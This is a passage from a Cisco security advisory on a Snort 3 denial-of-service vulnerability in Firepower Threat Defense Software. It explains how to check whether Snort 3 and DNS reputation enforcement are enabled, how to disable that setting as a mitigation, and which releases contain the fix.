    **Determine Cisco FTD Configuration for Cisco Firepower Management Center (FMC) Managed Devices**
    
    To determine if Snort 3 is configured on a device, do the following:
    
    1.  Log in to the FMC web interface.
    2.  From the **Devices** menu, choose **Device Management**.
    3.  Choose the appropriate FTD device.
    4.  Click the **Edit** pencil icon.
    5.  Click the **Device** tab and look in the **Inspection Engine** area.
        *   If **Snort 2** is listed, the device is not affected by this vulnerability.
        *   If **Snort 3** is listed, the device may be affected by this vulnerability.
    
    To determine if DNS reputation enforcement is enabled, do the following:
    
    1.  Log in to the FMC web interface.
    2.  From the **Policies** menu, choose **Access Control**.
    3.  Choose the policy to review.
    4.  Click the **Edit** pencil icon.
    5.  Click the **Advanced** tab.
    6.  In the **General Settings** area, look for **Enable reputation enforcement on DNS traffic.**
    
    *   If the setting is **Yes**, the device is affected by this vulnerability.
    *   If the setting is **No**, the device is not affected by this vulnerability.
    
    **Determine Cisco FTD Configuration for Cisco Firepower Device Management (FDM) Managed Devices**
    
    To determine if Snort 3 is configured on a device, do the following:
    
    1.  Log in to the FTD web interface.
    2.  From the main menu, choose **Policies**.
    3.  Click the **Intrusion** tab.
    4.  Look for the **Inspection Engine** version. The version will start with either a _2_ for Snort 2 or a _3_ for Snort 3.
        *   If the version begins with a _2_, the device is running a Snort 2 version and is not affected by this vulnerability.
        *   If the version begins with a _3_, the device is running a Snort 3 version and could be affected by this vulnerability.
    
    To determine if DNS reputation enforcement is enabled, do the following:
    
    1.  Log in to the FTD web interface.
    2.  From the main menu, choose **Policies**.
    3.  Click the **Access Control** tab.
    4.  Click the **Settings** gear.
    5.  Look for **Reputation Enforcement on DNS traffic**.
    
    *   If the setting is on, the device is affected by this vulnerability.
    *   If the setting is off, the device is not affected by this vulnerability.
    
    **Determine Cisco FTD Configuration for Cisco Defense Orchestrator Managed Devices**
    
    To determine if Snort 3 is configured, do the following:
    
    1.  Log in to the Cisco Defense Orchestrator web interface.
    2.  From the **Inventory** menu, choose the appropriate FTD device.
    3.  In the **Device Details** area, look for **Snort Version**. The version will start with either a _2_ for Snort 2 or a _3_ for Snort 3.
        *   If the version begins with a _2_, the device is running a Snort 2 version and is not affected by this vulnerability.
        *   If the version begins with a _3_, the device is running a Snort 3 version and could be affected by this vulnerability.
    
    To determine if DNS reputation enforcement is enabled, do the following:
    
    1.  Log in to the Cisco Defense Orchestrator web interface.
    2.  From the **Inventory** menu, choose the appropriate FTD device.
    3.  In the **Management** area, click **Policy**.
    4.  Click the **Settings** gear.
    5.  Look for **Reputation Enforcement on DNS traffic.**
        *   If the setting is on, the device is affected by this vulnerability.
        *   If the setting is off, the device is not affected by this vulnerability.
    
    Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability.
    
    Cisco has confirmed that this vulnerability does not affect the following Cisco products:
    
    *   Adaptive Security Appliance (ASA) Software
    *   FMC Software
    *   FTD Software that is running Snort 2
    *   Meraki MX Series Software
    *   Open source Snort 2 Project
    *   Open source Snort 3 Project
    

**

Workarounds

**

*   There are no workarounds that address this vulnerability. However, as a mitigation, administrators can disable DNS reputation enforcement. Disabling DNS reputation enforcement from the FTD CLI is not recommended because that process does not update the setting in the management device. This could cause instability in the system or unplanned reversion of the setting.
    
    To disable DNS reputation enforcement for Cisco FMC managed devices, do the following:
    
    1.  Log in to the FMC web interface.
    2.  From the **Policies** menu, choose **Access Control**.
    3.  Choose the policy to review.
    4.  Click the **Edit** pencil icon.
    5.  Click the **Advanced** tab.
    6.  Click the **Edit** pencil icon for **General Settings**.
    7.  Uncheck the **Enable reputation enforcement on DNS traffic** check box to turn the setting off.
    8.  Click **OK**.
    9.  Deploy the change to the FTD devices.
    
    To disable DNS reputation enforcement for Cisco FDM managed devices, do the following:
    
    1.  Log in to the FTD web interface.
    2.  From the main menu, click **Policies**.
    3.  Click the **Access Control** tab.
    4.  Click the **Settings** gear.
    5.  Look for the **Reputation Enforcement on DNS traffic**.
    6.  Click the switch to turn the setting off.
    7.  Click **OK**.
    
    To disable DNS Reputation Enforcement for Cisco Defense Orchestrator managed devices, do the following:
    
    1.  Log in to the Cisco Defense Orchestrator web interface.
    2.  From the **Inventory** menu, choose the appropriate FTD device.
    3.  In the **Management** area, click **Policy**.
    4.  Click the **Settings** gear.
    5.  Look for the **Reputation Enforcement on DNS traffic**.
    6.  Click the switch to turn the setting off.
    7.  Click **OK**.
    8.  Deploy the change to the FTD device.
    
    While these mitigations have been deployed and were proven successful in a test environment, customers should determine the applicability and effectiveness in their own environment and under their own use conditions. Customers should be aware that any workaround or mitigation that is implemented may negatively impact the functionality or performance of their network based on intrinsic customer deployment scenarios and limitations. Customers should not deploy any workarounds or mitigations before first evaluating the applicability to their own environment and any impact to such environment.
    

**

Fixed Software

**

*   Cisco has released free software updates that address the vulnerability described in this advisory. Customers with service contracts that entitle them to regular software updates should obtain security fixes through their usual update channels.
    
    Customers may only install and expect support for software versions and feature sets for which they have purchased a license. By installing, downloading, accessing, or otherwise using such software upgrades, customers agree to follow the terms of the Cisco software license:  
    https://www.cisco.com/c/en/us/products/end-user-license-agreement.html
    
    Additionally, customers may only download software for which they have a valid license, procured from Cisco directly, or through a Cisco authorized reseller or partner. In most cases this will be a maintenance upgrade to software that was previously purchased. Free security software updates do not entitle customers to a new software license, additional software feature sets, or major revision upgrades.
    
    The Cisco Support and Downloads page on Cisco.com provides information about licensing and downloads. This page can also display customer device support coverage for customers who use the My Devices tool.
    
    When considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page, to determine exposure and a complete upgrade solution.
    
    In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers.
    
    **Customers Without Service Contracts**
    
    Customers who purchase directly from Cisco but do not hold a Cisco service contract and customers who make purchases through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html
    
    Customers should have the product serial number available and be prepared to provide the URL of this advisory as evidence of entitlement to a free upgrade.
    
    **Fixed Releases**
    
    In the following table(s), the left column lists Cisco software releases. The center column indicates whether a release is affected by the vulnerability described in this advisory and the first release that includes the fix for this vulnerability. The right column indicates whether a release is affected by any of the Critical or High SIR vulnerabilities described in this bundle and which release includes fixes for those vulnerabilities.
    
    **FTD Software**
    
    Cisco FTD Software Release
    
    First Fixed Release for This Vulnerability
    
    First Fixed Release for All Vulnerabilities Described in the Bundle of Advisories
    
    6.2.2 and earlier1
    
    Not vulnerable.2
    
    Migrate to a fixed release.
    
    6.2.3
    
    Not vulnerable.2
    
    Migrate to a fixed release.
    
    6.3.01
    
    Not vulnerable.2
    
    Migrate to a fixed release.
    
    6.4.0
    
    Not vulnerable.2
    
    6.4.0.15 (May 2022)
    
    6.5.01
    
    Not vulnerable.2
    
    Migrate to a fixed release.
    
    6.6.0
    
    Not vulnerable.2
    
    6.6.5.2
    
    6.7.0
    
    Migrate to a fixed release.3
    
    Migrate to a fixed release.
    
    7.0.0
    
    7.0.2 (May 2022)
    
    7.0.2 (May 2022)
    
    7.1.0
    
    7.1.0.1
    
    7.1.0.1
    
    1\. Cisco FMC and FTD Software releases 6.2.2 and earlier, as well as releases 6.3.0 and 6.5.0, have reached end of software maintenance. Customers are advised to migrate to a supported release that includes the fix for this vulnerability.
    
    2\. Snort 3 was first included in Cisco FTD Release 6.7.0 for Cisco FDM and Cisco Defense Orchestrator managed devices. Snort 3 was first released in Cisco FTD Release 7.0.0 for Cisco FMC managed devices.
    
    3\. Only Cisco FDM and Cisco Defense Orchestrator managed devices are vulnerable in Release 6.7.0. Cisco FMC managed devices are not vulnerable because Snort 3 was not released in Cisco FMC managed devices until Release 7.0.0.
    
    For instructions on upgrading your FTD device, see Cisco Firepower Management Center Upgrade Guide.
    
    The Cisco Product Security Incident Response Team (PSIRT) validates only the affected and fixed release information that is documented in this advisory.
    

**

Exploitation and Public Announcements

**

*   The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.
    

**

Source

**

*   This vulnerability was found during the resolution of a Cisco TAC support case.
    

**

Cisco Security Vulnerability Policy

**

*   To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy. This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco.
    

*   Subscribe
    

**

Related to This Advisory

**

*   Cisco Event Response: April 2022 Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication
    

**

URL

**

*   https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-FTD-snort3-DOS-Aq38LVdM
    

**

Revision History

**

*   Version
    
    Description
    
    Section
    
    Status
    
    Date
    
    1.0
    
    Initial public release.
    
    \-
    
    Final
    
    2022-APR-27
    
    Show Less
    

**

Legal Disclaimer

**

*   THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.
    
    A standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for end users of Cisco products.
    

**

Feedback

**

*   Leave additional feedback

Tag

#ios